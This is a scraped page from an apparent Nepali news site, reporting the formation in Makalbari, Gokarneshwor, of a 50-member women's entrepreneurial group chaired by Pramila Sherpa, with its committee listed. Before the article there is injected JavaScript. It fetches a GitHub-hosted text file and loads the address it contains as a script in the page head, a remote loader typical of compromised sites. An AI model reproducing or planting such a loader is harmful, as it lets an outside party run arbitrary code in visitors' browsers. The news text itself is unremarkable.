;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वोर माकलबारी स्थित प्रमि शेर्पाको अध्यक्षतामा उधमशील महिला समुहको गठन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गोकर्णेश्वोर माकलबारी स्थित प्रमि शेर्पाको अध्यक्षतामा उधमशील महिला समुहको गठन
आर्थिक

गोकर्णेश्वोर माकलबारी स्थित प्रमि शेर्पाको अध्यक्षतामा उधमशील महिला समुहको गठन

मंसिर १५,

काठमाडौँ । गोकर्नेश्वोर नगरपालिका वडा नं ४ माकालबारीमा प्रमि शेर्पाको अध्यक्षतामा उधमशिल महिला समुहको स्थापना भएको छ | त्यस क्षेत्रका महिलाहरुको हक हितमा काम गर्ने उदेश्यले ५० जना महिलाहरुको सदस्य सहित सो समूह स्थापना भएको हो |

No description available.

महिला समुहको कार्यसमिति

अध्यक्ष : प्रमिला शेर्पा (प्रमि)

उपाध्यक्ष: मिरा खरेल

सचिब : शर्मिला रिजाल

कोषाध्यक्ष सरिता बरुवाल

सदस्यहरु : सिता भुजेल, मनिता राइ , शुसिला लामा |

यी सात जनाको कार्यसमिति रहेको सो समुहले बचत उठाउने, सस्तोमा महिलाहरुले नै ब्याजमा लाने सेवा समेत सुरु गर्ने अध्यक्षले बताइन | साथै महिला अभिमुखीकरण तालिम, शिप मुलक तालिमहरु समेत गरेर अगाडी बढ्ने योजना रहेको उनको भनाइ छ  | सो समूह स्थापना गर्न समाजसेवी राजु सुनारले सहयोग गरेका हुन् |

No description available.

फेसबुक प्रतिक्रियाहरु